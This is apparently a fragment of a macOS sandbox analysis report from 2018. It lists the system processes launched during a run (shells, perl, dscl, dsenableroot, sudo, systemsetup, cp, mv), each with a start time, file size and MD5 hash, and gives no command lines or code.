Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/perl5.18
File size:52864 bytes
MD5 hash:8ae6e9b236ab4239edf4257f504256a4

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/dscl
File size:202560 bytes
MD5 hash:2072d2ac07a471913b06fed4b4bd55cf

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/perl5.18
File size:52864 bytes
MD5 hash:8ae6e9b236ab4239edf4257f504256a4

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/sh
File size:618512 bytes
MD5 hash:8aa60b22a5d30418a002b340989384dc

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/dscl
File size:202560 bytes
MD5 hash:2072d2ac07a471913b06fed4b4bd55cf

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/perl5.18
File size:52864 bytes
MD5 hash:8ae6e9b236ab4239edf4257f504256a4

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/defaults
File size:39472 bytes
MD5 hash:831678c94c2d9c647bf3d283b1861bda

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/perl5.18
File size:52864 bytes
MD5 hash:8ae6e9b236ab4239edf4257f504256a4

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/defaults
File size:39472 bytes
MD5 hash:831678c94c2d9c647bf3d283b1861bda

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/sbin/dsenableroot
File size:30080 bytes
MD5 hash:9aa91a63738de78dc7fd510f0fd5d9c5

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/sbin/systemsetup
File size:124240 bytes
MD5 hash:63847628d396b5b245013f1417946a56

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/cp
File size:29008 bytes
MD5 hash:57fc302d74610c3350e683c6c9771076

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/mv
File size:24240 bytes
MD5 hash:7f791dd4bef08d618fece911d6e3398a

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/cp
File size:29008 bytes
MD5 hash:57fc302d74610c3350e683c6c9771076

General

Start time:16:37:43
Start date:26/07/2018
Path:/bin/bash
File size:618448 bytes
MD5 hash:a17c5d0e7f7f4f69c6218066c2a3e1b6

General

Start time:16:37:43
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:44
Start date:26/07/2018
Path:/usr/bin/sudo
File size:365760 bytes
MD5 hash:60ac5909d06d86e22aace3a863b13690

General

Start time:16:37:44
Start date:26/07/2018
Path:/bin/cp
File size:29008 bytes
MD5 hash:57fc302d74610c3350e683c6c9771076